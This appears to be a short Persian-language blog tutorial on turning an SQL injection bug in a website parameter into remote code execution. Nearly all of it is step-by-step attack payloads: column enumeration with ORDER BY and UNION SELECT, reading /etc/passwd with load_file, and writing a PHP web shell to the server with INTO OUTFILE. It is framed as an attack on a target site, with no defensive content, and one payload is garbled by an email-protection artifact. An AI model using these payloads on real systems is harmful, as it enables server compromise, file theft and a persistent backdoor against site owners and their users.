تبدیل باگ SQL injection به RCE

تبدیل باگ SQL injection به RCEباگ SQL injection که حاصل از پردازش غیرایمن در پارامتر های ورودی وبسایت است را میتوان به باگ rce یا همان arbitrary code execution تبدیل کرد.مثال باگSQLsite.com/products.php?id=3’order by 2–+تبدیل این باگ به RCE به ما امکان اجرای کد های مخرب در سرور را میدهد. اولین قدم پیدا کردن ستون آسیب پذیر است.site.com/products.php?id=3′ order by n–+به جای n اعداد طبیعی را قرار میدهیم تا جایی که به بزرگترین عددی که بدون خطا محتوا را لود میکند برسیماستفاده از یکی از روش های SQL injection بطور مثال UNION BASE :site.com/products.php?id=-3′ union select 1,2,3,4,5–+بطور مثال در اینجا ستون آسیب پذیر دو است.دریافت نام دیتابیس فعلیsite.com/products.php?id=-3′ union select 1,database(),3,4,5–+اجرای اولین دستور بر روی شل سرور:دستور لود فایل در اینجا فایلی را که حاوی پسورد یوزر های سرور است را در می آورد.نکته: دسترسی وبسایت تارگت در اینجا اهمیت بالایی دارد.site.com/products.php?id=-3′ union select 1,load_file(&quotetc/passwd&quot),3,4,5–+ایجاد فایل بر روی سرور:در این مرحله دستورات کمی تغییر می کنند:site.com/products.php?id=-3′ union select 1,[email protected]&quot,3,4,5 INTO OUTFILE &quot/tmp/injection&quot–+مرحله دوم:site.com/products.php?id=-3′ union select 1,&quot<?php $cmd = $_GET[`injection`]; echo system ($cmd); ?>&quot,3,4,5 INTO OUTFILE &quot/home/$path/shell.php&quot–+

Author: admin

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *